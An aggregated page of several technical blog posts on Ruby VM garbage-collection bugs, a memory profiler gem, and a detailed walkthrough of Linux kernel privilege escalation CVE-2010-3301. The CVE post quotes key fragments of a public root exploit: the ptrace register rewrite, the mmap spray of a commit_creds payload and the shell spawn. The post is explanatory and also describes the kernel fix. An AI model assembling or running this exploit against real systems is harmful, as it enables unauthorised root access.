The Broken Promises of MRI/REE/YARV »
Created at: 05.07.2011 16:00, source: time to bleed by Joe Damato, tagged: bugfix debugging linux osx ruby systems x86

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
tl;dr
This post is going to explain a serious design flaw of the object system used in MRI/REE/YARV. This flaw causes seemingly random segfaults and other hard to track corruption. One popular incarnation of this bug is the “rake aborted! not in gzip format.”
theme song
This blog post was inspired by one of my favorite Papoose verses. If you don’t listen to this while reading, you probably won’t understand what I’m talking about: get in the zone.
rake aborted! not in gzip format
[BUG] Segmentation fault
If you’ve seen either of these error messages you are hitting a fundamental flaw of the object model in MRI/YARV. An example of a fix for a single instance of this bug can be seen in this patch. Let’s examine this specific patch so that we can gain some understanding of the general case.
FACT: What you are about to read is absolutely not a compiler bug.
A small, but important piece of background information
The amd64 ABI1 states that some registers are caller saved, while others are callee saved. In particular, the register rax is caller saved. The callee will overwrite the value in this register to store its return value for the caller so if the caller cares about what is stored in this register, it must be copied prior to a function call.
stare into the abyss part 1
Let’s look at the C code for gzfile_read_raw_ensure WITHOUT the fix from above:
#define zstream_append_input2(z,v)\
zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))
static int
gzfile_read_raw_ensure(struct gzfile *gz, int size)
{
VALUE str;
while (NIL_P(gz->z.input) || RSTRING_LEN(gz->z.input) < size) {
str = gzfile_read_raw(gz);
if (NIL_P(str)) return Qfalse;
zstream_append_input2(&gz->z, str);
}
return Qtrue;
}
It looks relatively sane at first glance, but to understand this bug we’ll need to examine the assembly generated for this thing. I’m going to rearrange the assembly a bit to make it easier to follow and add few comments a long the way.
First, the code begins by setting the stage:
push %rbp movslq %esi,%rbp # sign extend "size" into rbp push %rbx mov %rdi,%rbx # rbx = gz sub $0x8,%rsp # make room on the stack for "str"
The above is pretty basic. It is your typical amd64 prologue. After things are all setup, it is time to enter into the while loop in the C code above:
jmp 1180# JUMP IN to the loop
Next comes the NIL_P(gz->z.input) portion of the while-loop condition:
mov 0x18(%rbx),%rax # rax = gz->z.input cmp $0x4,%rax # in Ruby, nil is represented as 4. je 1190 [gzfile_read_raw_ensure+0x30] # if gz->z.input is nil, enter the loop
Now the RSTRING_LEN(gz->z.input) < size portion:
cmp %rbp,0x10(%rax) # compare size and gz->z.input->len
jge 11b0 [gzfile_read_raw_ensure+0x50] # jump out of loop
# if gz->z.input->len is >= size
Next comes the call to gzfile_read_raw and the NIL_P(str) check. If this check fails, the code just falls through and exits the loop:
mov %rbx,%rdi # rdi = gz, rdi holds the first argument to a function. callq 1090 [gzfile_read_raw] # call gzfile_read_raw cmp $0x4,%rax # compare return value (%rax) to nil jne 1170 [gzfile_read_raw_ensure+0x10] # if it is NOT nil jump to the good stuff
The return value of gzfile_read_raw_ensure (an address of a ruby object) is stored in rax.
And finally, the good stuff. The call to zstream_append_input:
mov 0x10(%rax),%rdx # RSTRING_LEN(v) as 3rd arg mov 0x18(%rax),%rsi # RSTRING_PTR(v) as 2nd arg mov %rbx,%rdi # set gz->z as the 1st arg callq 10e0 [zstream_append_input] # let it rip
Note that the arguments to zstream_append_input are moved into registers by offsetting from rax and that when the call to zstream_append occurs, the ruby object returned from gzfile_read_raw_ensure is still stored in rax and not written to it's slot on the stack because the extra write is unnecessary.
stare into the abyss part 2
Aright, so the patch changes the zstream_append_input2 macro to this:
#define zstream_append_input2(z,v)\
RB_GC_GUARD(v),\
zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))
And, RB_GC_GUARD is defined as:
#define RB_GC_GUARD_PTR(ptr) \
__extension__ ({volatile VALUE *rb_gc_guarded_ptr = (ptr); rb_gc_guarded_ptr;})
#define RB_GC_GUARD(v) (*RB_GC_GUARD_PTR(&(v)))
That code is just a hack to mark the memory location holding v with the volatile type qualifier. This tells the compiler that memory backing v acts in ways that the compiler is too stupid to understand, so the compiler must ensure that reads and writes to this location are not optimized out.
A common usage of this qualifier is for memory mapped registers. Reads from memory mapped registers should not be optimized away since a hardware device may update the value stored at that location. The compiler wouldn't know when these updates could happen so it must make sure to re-read the value from this memory location when it is needed. Similarly, writes to memory mapped registers may modify the state of a hardware device and should not be optimized away.
Most of the code generated with the patch applied is the same as without except for a few slight differences before zstream_append_input is called. Let's take a look:
mov %rax,-0x18(%rbp) # write str to the stack mov -0x18(%rbp),%rax # read the value in str back to rax mov 0x10(%rcx),%rdx # RSTRING_LEN(v) mov 0x18(%rcx),%rsi # RSTRING_PTR(v) mov %rbx,%rdi # z callq 1f60 [_zstream_append_input]
The key difference is that the return value of gz_file_read_raw is written back to it's memory location (which, in this case, happens to be on the stack and is called str).
the bug
The bug is triggered because:
- The address of the ruby object str is stored in a caller saved register,
rax. - The callee (
zstream_append_input) does not save the value ofrax(it is not required to) andraxis overwritten in the function, leaving no references to the ruby object returned bygzfile_read_raw. - The callee (
zstream_append_input) eventually callsrb_newobj.rb_newobjmay trigger a GC run, if there are no available objects on the freelist. - The GC run finds the object returned by
gzfile_read_rawbut sees no references to it and frees the memory associated with it. - The freed object is used as it were it were valid, and memory corruption occurs causing the VM to explode.
The patch prevents this bug from happening because:
- The address of the ruby object str is stored in a caller saved register,
rax. - The
volatiletype qualifier causes the compiler to generate code which writes the return value back into it's memory location on the stack. - The callee (
zstream_append_input) eventually callsrb_newobj.rb_newobjmay trigger a GC run, if there are no available objects on the freelist. - The GC run finds the object returned by
gzfile_read_rawand finds a reference to it and therefore does not free it. - Everyone is happy.
The general case
Given valid C code, gcc will generate machine instructions that correctly do what you want. Of course, there are bugs in gcc just like any other piece of software. The problem in this case is not gcc. The problem is that the object and garbage collection implementations in REE/MRI/YARV are not valid C code, so it is not possible for gcc to generate machine instructions that do the right thing. In other words, Ruby's object and GC implementations are breaking their contract with gcc.
The end result is the need for shit like RB_GC_GUARD in REE/MRI/YARV and also in Ruby gems to selectively paper over valid gcc optimizations. Having an API that might cause the Ruby VM to fucking explode unless you proactively mark things with RB_GC_GUARD is not on the path of least resistance toward building a maintainable, safe, and performant system. Very few people out there know that the volatile type qualifier exists, let alone what it does. Essentially, this means that authors of Ruby gems must understand how GC works in the VM to prevent their gems from causing GC to break the universe.
That is fucking beyond stupid.
How to detect this bug class
This could be detected by building a simple static analysis tool. You won't catch 100% of cases, and you will definitely have false positives, but it is better than nothing. Something like this should work:
- Build a call digraph of the VM and/or the set of gems you care about.
- Find all paths leading to the
rb_newobjsink. - Find all paths which call
rb_newobj, but do not saveraxprior to making another function call which is also on a path torb_newobj. - The functions found are very likely to be causing corruption. A human will need to examine the found cases to weed out false positives and to fix the code.
If you have found yourself wondering who the fuck would write such a test? it is important for you to note that rtld in Linux does not save the SSE registers (which are supposed to be caller saved) prior to entering the fixup function, however to ensure that such an optimization does not cause the fucking universe to come crashing down, a test ships with the code to run objdump after building the binary. The objdump output is then grepped for any instructions which might modify the SSE registers. As long as no one touches the SSE registers, there is no need to save and restore them.
If Ruby's object and GC subsystems want to prevent the universe from exploding, it must supply an equivalent test to ensure that corruption is impossible.
Conclusion
- MRI/YARV/REE are inherently fatally flawed.
- I'm never writing another Ruby-related blog post.
- I'm not a Ruby programmer.
No comments
I'm taking a page from the book of coda and disabling comments. If you got something to say, write a blog post.
If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.
References
more »
detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301) »
Created at: 27.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux security systems x86 bugfix kernel privilege escalation privileges syscall vulnerability x86_64

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
tl;dr
This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.
This article is long and technical; prepare yourself.
ia32 syscall emulation
There are two ways to invoke system calls on the Intel/AMD family of processors:
- Software interrupt
0x80. - The
sysenterfamily of instructions.
The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.
The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.
This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.
ptrace(2) and the ia32 syscall emulation layer
From the ptrace(2) man page (emphasis mine):
The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.
If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:
ENTRY(ia32_syscall)
/* . . . */
GET_THREAD_INFO(%r10)
orl $TS_COMPAT,TI_status(%r10)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
jnz ia32_tracesys
This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.
Let’s take a look2:
ia32_tracesys:
/* . . . */
call syscall_trace_enter
LOAD_ARGS32 ARGOFFSET /* reload args from stack in case ptrace changed it */
RESTORE_REST
cmpl $(IA32_NR_syscalls-1),%eax
ja int_ret_from_sys_call /* ia32_tracesys has set RAX(%rsp) */
jmp ia32_do_call
END(ia32_syscall)
Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.
Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax
This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.
Let’s take a look at the LOAD_ARGS32 macro3:
.macro LOAD_ARGS32 offset, _r9=0 /* . . . */ movl \offset+40(%rsp),%ecx movl \offset+48(%rsp),%edx movl \offset+56(%rsp),%esi movl \offset+64(%rsp),%edi .endm
Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.
Let’s take a look at ia32_do_call which actually transfers execution to the system call4:
ia32_do_call:
IA32_ARG_FIXUP
call *ia32_sys_call_table(,%rax,8) # xxx: rip relative
The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.
subtle bug leads to sexy exploit
This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.
The exploit is made by possible by three key things:
- The register
%eaxis not touched in theLOAD_ARGSmacro and can be set to any arbitrary value by a call toptrace. - The
ia32_do_calluses%rax, not%eax, when indexing into theia32_sys_call_table. - The
%eaxcheck (cmpl $(IA32_NR_syscalls-1),%eax) inia32_tracesysonly checks%eax. Any bits in the upper 32bits of%raxwill be ignored by this check.
These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.
Damnnnnn, that’s hot.
the exploit, step by step
The exploit code is available here and was written by Ben Hawkes and others.
The exploit begins execution by forking and executing two copies of itself:
if ( (pid = fork()) == 0) {
ptrace(PTRACE_TRACEME, 0, 0, 0);
execl(argv[0], argv[0], "2", "3", "4", NULL);
perror("exec fault");
exit(1);
}
The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.
The parent process enters a loop:
for (;;) {
if (wait(&status) != pid)
continue;
/* ... */
rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
if (rax == 0x000000000101) {
if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
printf("PTRACE_POKEUSER fault\n");
exit(1);
}
set = 1;
}
/* ... */
if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
printf("PTRACE_SYSCALL fault\n");
exit(1);
}
}
The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.
While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:
commit_creds = (_commit_creds) get_symbol("commit_creds");
/* ... */
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
/* ... */
Next, the child process attempts to create an anonymous memory mapping using mmap:
if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
/* ... */
This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).
This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:
int kernelmodecode(void *file, void *vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
The address of that function is written over and over to the 64mb memory that was mapped in:
for (; (uint64_t) ptr < (tmp + size); ptr++)
*ptr = (uint64_t)kernelmodecode;
Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
/* . . . */
execl("/bin/sh", "bin/sh", NULL);
tying it all together
When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.
The child executes the erroneous check described above:
cmpl $(IA32_NR_syscalls-1),%eax
ja int_ret_from_sys_call /* ia32_tracesys has set RAX(%rsp) */
jmp ia32_do_call
Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.
Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.
call *ia32_sys_call_table(,%rax,8)
Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.
kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.
The system has been rooted.
The fix
The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.
Conclusions
- Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
- The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
- Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
- I'm not a Ruby programmer.
If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.
References
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430
more »
Descent into Darkness: Understanding your system’s binary interface is the only way out »
Created at: 15.03.2010 21:11, source: time to bleed by Joe Damato, tagged: bugfix debugging linux ruby scaling systems x86 debug garbage collection GC memory performance syscall x86_64
Download as PDF (3mb)
Descent into Darkness: Understanding your system’s binary interface is the only way out.
more »
Garbage Collection Slides from LA Ruby Conference »
Created at: 21.02.2010 00:03, source: time to bleed by Joe Damato, tagged: bugfix debugging ruby debug garbage collection GC memory performance profiling
Garbage Collection and the Ruby Heap
more »
memprof: A Ruby level memory profiler »
Created at: 11.12.2009 14:59, source: time to bleed by Joe Damato, tagged: bugfix debugging linux monitoring ruby systems x86 debug garbage collection GC memory performance profiling system health x86_64

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
What is memprof and why do I care?
memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.
Where do I get it?
memprof is available on gemcutter, so you can just:
gem install memprof
Feel free to browse the source code at: http://github.com/ice799/memprof.
How do I use it?
Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.
memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:
- Objects are created and not destroyed when you create new classes. This is a good thing.
- Sometimes garbage objects sit around until
garbage_collecthas had a chance to run. These objects will go away. - Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.
memprof will show objects created in all cases listed above.
OK, now Let’s take a look at two examples and their output.
A simple program with an obvious memory “leak”:
require 'memprof'
@blah = Hash.new([])
Memprof.start
100.times {
@blah[1] << "aaaaa"
}
1000.times {
@blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop
This program creates 1100 objects which are not destroyed during the start and stop sections of the file because references are held for each object created.
Let's look at the output from memprof:
1000 test.rb:11:String
100 test.rb:7:String
In this example memprof shows the 1100 created, broken up by file, line number, and type.
Let's take a look at another example:
require 'memprof' Memprof.start require "stringio" StringIO.new Memprof.stats
This simple program is measuring the number of objects created when requiring stringio.
Let's take a look at the output:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
14 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 test2.rb:4:StringIO
1 test2.rb:4:String
1 test2.rb:3:Array
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.
What if nudge the garbage_collector along a little bit just for our example? Let's add the following two lines of code to our previous example:
GC.start Memprof.stats
We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
2 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
As you can see above, a few Strings and other objects went away after the garbage collector ran.
Which Rubies and systems are supported?
- Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run:
file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary. - Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
- Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
- Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
- Snow Leopard support is experimental at this time.
- Ruby 1.9 support coming soon.
How does it work?
If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.
memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.
memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.
What else is planned?
Myself, Jake Douglas, and Aman Gupta have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)
Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.
more »
